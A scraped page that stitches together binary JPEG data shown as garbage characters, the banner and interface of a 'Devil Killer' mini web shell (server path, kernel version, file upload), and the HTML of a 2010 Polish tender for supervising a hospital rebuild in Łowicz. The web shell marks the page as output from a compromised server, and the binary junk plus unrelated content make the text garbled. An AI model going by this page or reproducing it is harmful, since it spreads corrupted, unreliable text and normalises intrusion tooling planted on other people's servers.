JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100725/223384-N-2010.html

<p class="kh_header"><b>Łowicz: Nadzór inwestorski nad  przebudową budynku Szpitala Zespołu Opieki Zdrowotnej 
w Łowiczu w ramach zadania inwestycyjnego: Wzmocnienie potencjału sieci usług medycznych północno-wschodniej części województwa łódzkiego poprzez przebudowę budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu oraz doposażenie go w sprzęt i aparaturę medyczną</b><br>
<b>Numer ogłoszenia: 223384 - 2010; data zamieszczenia: 25.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Łowicki , ul. Stanisławskiego 30, 99-400 Łowicz, woj. łódzkie, tel. 046 8375902, faks 46 8375015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.lowicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad  przebudową budynku Szpitala Zespołu Opieki Zdrowotnej 
w Łowiczu w ramach zadania inwestycyjnego: Wzmocnienie potencjału sieci usług medycznych północno-wschodniej części województwa łódzkiego poprzez przebudowę budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu oraz doposażenie go w sprzęt i aparaturę medyczną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług nadzoru inwestorskiego
nad  realizacją następujących robót budowlanych, które będą wykonywane w budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu w ramach zadania inwestycyjnego: Wzmocnienie potencjału sieci usług medycznych północno-wschodniej części województwa łódzkiego poprzez przebudowę budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu oraz doposażenie go w sprzęt i aparaturę medyczną :
1.	Roboty budowlane związane z przebudową bloku operacyjnego.
1.1.	Roboty budowlane związane z przebudową oddziału anestezjologii i intensywnej terapii.
1.2.	Roboty budowlane związane ze wzmocnieniem stropów bloku operacyjnego i oddziału anestezjologii i intensywnej terapii pod montaż urządzeń medycznych.
1.3.	Roboty termomodernizacyjne obejmujące swym zakresem: 
a.	wymianę stolarki okiennej i drzwiowej, z wyjątkiem okien wcześniej wymienionych, w tym m.in.: montaż okien z szybami antywłamaniowymi 
P-4 - 18 szt. w obrębie pomieszczeń magazynowych i apteki szpitalnej, z tego 5 szt. z szybami mlecznymi, montaż okien z szybami mlecznymi 4 szt. 
w pomieszczeniach magazynowych piwnicy, montaż okien wyposażonych w siłowniki automatyki p.poż. sprzężone z instalacją p.poż. 
na klatkach schodowych.
b.	ocieplenie ścian styropianem 14 cm metodą lekką- mokrą, 
c.	ocieplenie stropodachów styropianem laminowanym 15 cm wraz z pokryciem i obróbkami blacharskimi,
d.	demontaż i montaż na konstrukcji stalowej instalacji solarnej,
e.	demontaż i montaż balustrad na dachu szpitala,
f.	roboty budowlane związane z wykuciem 
lub zamurowaniem otworów okiennych.
1.4.	Roboty budowlane związane z dobudową klatki schodowej I.
1.5.	Roboty budowlane związane z dobudową klatki schodowej II.
1.6.	Roboty budowlane związane z demontażem biegów schodowych klatek, wykonaniem stropów, tynków i podłóg
w nowopowstałych pomieszczeniach.
1.7.	Roboty budowlane związane z adaptacją pomieszczenia sprężarkowi zasilającej blok operacyjny i oddział anestezjologii i intensywnej terapii w gazy techniczne.
1.8.	Roboty budowlane związane z adaptacją pomieszczenia sprężarkowi zasilającej blok operacyjny i oddział anestezjologii i intensywnej terapii w gazy medyczne.
1.9.	Roboty budowlane związane z adaptacją pomieszczeń na pracownię RTG.
1.10.	Roboty budowlane związane z adaptacją pomieszczeń sterylizatorni.
2.	Zakres robót sanitarnych:
2.1.	Wykonanie instalacji wodociągowej, kanalizacyjnej, centralnego ogrzewania i ciepła technologicznego dla bloku operacyjnego i oddziału anestezjologii i intensywnej terapii.
2.2.	Wykonanie instalacji gazów medycznych dla bloku operacyjnego i oddziału anestezjologii i intensywnej terapii.
2.3.	Wykonanie instalacji gazów technicznych dla bloku operacyjnego i oddziału anestezjologii i intensywnej terapii.
2.4.	Wykonanie instalacji wentylacji i klimatyzacji, w tym: całości instalacji znajdującej się na dachu budynku szpitala, wentylację i klimatyzację w obrębie bloku operacyjnego, wentylację i klimatyzację w obrębie oddziału anestezjologii i intensywnej terapii, przejście przez strop i zakończenie pod stropem przewodów wentylacji i klimatyzacji w obrębie oddziału położniczo-ginekologicznego. Zadanie nie przewiduje realizacji klimatyzacji i wentylacji w obrębie oddziału położniczo-ginekologicznego.Roboty budowlane związane z adaptacją pomieszczeń na pracownię RTG.
2.5.	Roboty  związane z adaptacją pomieszczeń sterylizatorni.
2.6.	Roboty  związane z adaptacją pomieszczeń na pracownię RTG.

3.	 Zakres robót elektrycznych:
3.1.	Wykonanie instalacji elektrycznej dla bloku operacyjnego 
i oddziału anestezjologii i intensywnej terapii, z uwzględnieniem urządzeń stanowiących przedmiot zamówienia oraz sprowadzenie instalacji do rozdzielni znajdującej się w piwnicy budynku szpitala.
3.2.	Wykonanie instalacji elektrycznej klatek schodowych oraz sprowadzenie instalacji do rozdzielni znajdującej się w piwnicy budynku szpitala.
3.3.	Wykonanie instalacji odgromowej.
3.4.	Wykonanie przyłącza elektrycznego od stacji transformatorowej do rozdzielni w piwnicy budynku szpitala (ze względu na zwiększenie zapotrzebowania na moc dla budynku przewiduje się ułożenie dodatkowego przewodu): demontaż istniejącej rozdzielni i budowa nowej, wpięcie istniejących obwodów do nowej rozdzielni, zasilanie projektowanej pracowni RTG, wymiana pionu elektrycznego w przebudowywanej klatce schodowej, roboty elektryczne w zakresie dostosowania klatek schodowych do przepisów p-poż.
3.5.	Roboty  związane z adaptacją pomieszczeń sterylizatorni.
3.6.	Roboty  związane z adaptacją pomieszczeń na pracownię RTG.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających
 w następującym zakresie: 
1. nadzór inwestorski nad wykonaniem instalacji przeciwpożarowej, 
2. nadzór inwestorski nad wykonaniem  instalacji ewakuacyjnej i awaryjnej istniejącej klatki schodowej, 
3. nadzór inwestorski nad dostosowaniem drogi ewakuacyjnej biegnącej przez istniejącą klatkę schodową do wymogów p.poż, 
4. nadzór inwestorski nad wykonaniem robót budowlanych wykończeniowych 
w pomieszczeniach powstałych w związku z budową klatek schodowych 
i wykonaniem stropów oraz prowadzeniem instalacji, 
5. nadzór inwestorski nad wykonaniem  wyłazów dachowych, 
6. nadzór inwestorski nad wykonaniem  sieci logicznej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, to w tym okresie:
Zadanie nr 1
Wykonał (zakończył) usługi nadzoru inwestorskiego w specjalności konstrukcyjno - 
budowlanej nad co najmniej 1 robotą budowlaną obejmującą budowę, przebudowę lub rozbudowę budynku, której wartość bez robót sanitarnych i elektrycznych była nie mniejsza niż 1 000 000,00 zł.
Zadanie nr 2
Wykonał (zakończył) usługi nadzoru inwestorskiego w specjalności instalacyjnej
w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych nad co najmniej 1 robotą budowlaną, której zakres obejmował roboty sanitarne, w tym budowę, rozbudowę
lub przebudowę instalacji gazów medycznych, o łącznej wartości robót sanitarnych nie mniejszej niż 100 000,00 zł.
Zadanie nr 3
Wykonał (zakończył) usługi nadzoru inwestorskiego w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
nad co najmniej 1 robotą budowlaną obejmującą roboty elektryczne, w tym budowę, rozbudowę lub przebudowę instalacji elektrycznej niskonapięciowej, o łącznej wartości robót elektrycznych nie mniejszej niż 100 000,00 zł.
Zamawiający dokona oceny spełniania tego warunku na podstawie analizy Wykazu wykonanych usług oraz dokumentów potwierdzających ich należyte wykonanie
na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje, lub będzie dysponował:

Zadanie nr 1
- minimum jedną osobą z uprawnieniami do kierowania robotami budowlanymi
bez ograniczeń w specjalności konstrukcyjno-budowlanej, posiadającą prawo pełnienia samodzielnych funkcji technicznych w budownictwie, 
posiadającą wykształcenie wyższe techniczne, należącą do właściwej Izby Inżynierów Budownictwa oraz posiadającą co najmniej
5 letnie doświadczenie po uzyskaniu uprawnień,
Zadanie nr 2
- minimum jedną osobą z uprawnieniami do kierowania robotami budowlanymi
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, posiadającą prawo pełnienia samodzielnych funkcji technicznych w budownictwie, posiadającą wykształcenie wyższe techniczne, należącą do właściwej Izby Inżynierów Budownictwa oraz posiadającą minimum 5 letnie doświadczenie zawodowe
po uzyskaniu uprawnień.
Zadanie nr 3
- minimum jedną osobą z uprawnieniami do kierowania robotami budowlanymi
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych
i elektroenergetycznych, posiadającą prawo pełnienia samodzielnych funkcji technicznych w budownictwie, posiadającą wykształcenie wyższe techniczne, należącą do właściwej Izby Inżynierów Budownictwa oraz posiadającą minimum 5 letnie doświadczenie zawodowe po uzyskaniu uprawnień,
Zamawiający dokona oceny spełniania tego warunku na podstawie analizy wykazu  osób, które będą uczestniczyły w wykonywaniu zamówienia oraz oświadczenia
o posiadaniu przez te osoby wymaganych uprawnień na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo w przypadku podpisywania oferty przez osobę/osoby, których umocowanie do wykonywania tych czynności nie wynika z innych przedstawionych
z ofertą dokumentów - w formie oryginału lub kopii potwierdzonej notarialnie 
za zgodność z oryginałem, 
2) Pełnomocnictwo Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy) - w formie oryginału lub kopii potwierdzonej notarialnie za zgodność 
z oryginałem,
3) Jeżeli Wykonawca polega na wiedzy i doświadczeniu lub/i osobach zdolnych
do wykonania zamówienia innych podmiotów jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, 
4) Zestawienie kosztów nadzoru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian w umowie dotyczących:
1.	Terminu realizacji przedmiotu niniejszego zamówienia, w przypadku zmiany terminów wykonania dla Wykonawców robót budowlanych. 
2.	Osób wskazanych w § 9 ust. 1 umowy, pod warunkiem, że proponowana osoba, która podejmie obowiązki Inspektora nadzoru, musi spełniać warunki określone w Specyfikacji Istotnych Warunków Zamówienia. 
3.	Podmiotów na których wiedzy doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowej polega Inspektor nadzoru, pod warunkiem, że proponowany podwykonawca spełnia warunki określone w Specyfikacji Istotnych Warunków Zamówienia.
4.	Sposobu i terminów rozliczania usług stanowiących przedmiot zamówienia,
pod warunkiem, że kwota wskazana w § 5 umowy nie ulegnie zwiększeniu. 
5.	Zmniejszenia wynagrodzenia wskazanego w § 5 umowy, jeżeli zmniejszy się zakres nadzorowanych robót.
6.	 Nr rachunku bankowego.
7.	Zmian związanych z uzyskaniem przez Zamawiającego dofinansowania
na realizację projektu pt. Wzmocnienie potencjału sieci usług medycznych północno-wschodniej części województwa łódzkiego poprzez przebudowę budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu oraz doposażenie go w sprzęt i aparaturę medyczną , lub z dotrzymaniem zobowiązań wynikających z umowy
o jego dofinansowanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.lowicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Łowiczu, ul. Stanisławskiego 30, 99-400 Łowicz..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2010 godzina 10:00, miejsce: Sekretariat Starostwa Powiatowego w Łowiczu, ul. Stanisławskiego 30, 99-400 Łowicz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Na realizację projektu pn. Wzmocnienie potencjału sieci usług medycznych północno-wschodniej części województwa łódzkiego poprzez przebudowę budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu oraz doposażenie go w sprzęt i aparaturę medyczną Zamawiający otrzymał dofinansowanie w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013, Oś Priorytetowa V Infrastruktura społeczna, Działanie V.1 Infrastruktura ochrony zdrowia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie nadzoru inwestorskiego nad robotami specjalności konstrukcyjno - budowlanej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług nadzoru inwestorskiego
w specjalności konstrukcyjno - budowlanej nad  realizacją następujących robót budowlanych, które będą wykonywane w budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu w ramach zadania inwestycyjnego: Wzmocnienie potencjału sieci usług medycznych północno-wschodniej części województwa łódzkiego poprzez przebudowę budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu oraz doposażenie go w sprzęt i aparaturę medyczną. Zakres robót, których nadzorowanie jest przedmiotem zamówienia został wskazany w pkt II.1.3.1 niniejszego ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie nadzoru inwestorskiego nad robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług nadzoru inwestorskiego
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych nad  realizacją następujących robót budowlanych, które będą wykonywane w budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu w ramach zadania inwestycyjnego: Wzmocnienie potencjału sieci usług medycznych północno-wschodniej części województwa łódzkiego poprzez przebudowę budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu oraz doposażenie go w sprzęt i aparaturę medyczną. Zakres robót, których nadzorowanie jest przedmiotem zamówienia został wskazany w pkt II.1.3.2 niniejszego ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie nadzoru inwestorskiego nad robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług nadzoru inwestorskiego
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych nad  realizacją następujących robót budowlanych, które będą wykonywane w budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu w ramach zadania inwestycyjnego: Wzmocnienie potencjału sieci usług medycznych północno-wschodniej części województwa łódzkiego poprzez przebudowę budynku Szpitala Zespołu Opieki Zdrowotnej w Łowiczu oraz doposażenie go w sprzęt i aparaturę medyczną. Zakres robót, których nadzorowanie jest przedmiotem zamówienia został wskazany w w pkt II.1.3.3 niniejszego ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-4.</p></li>
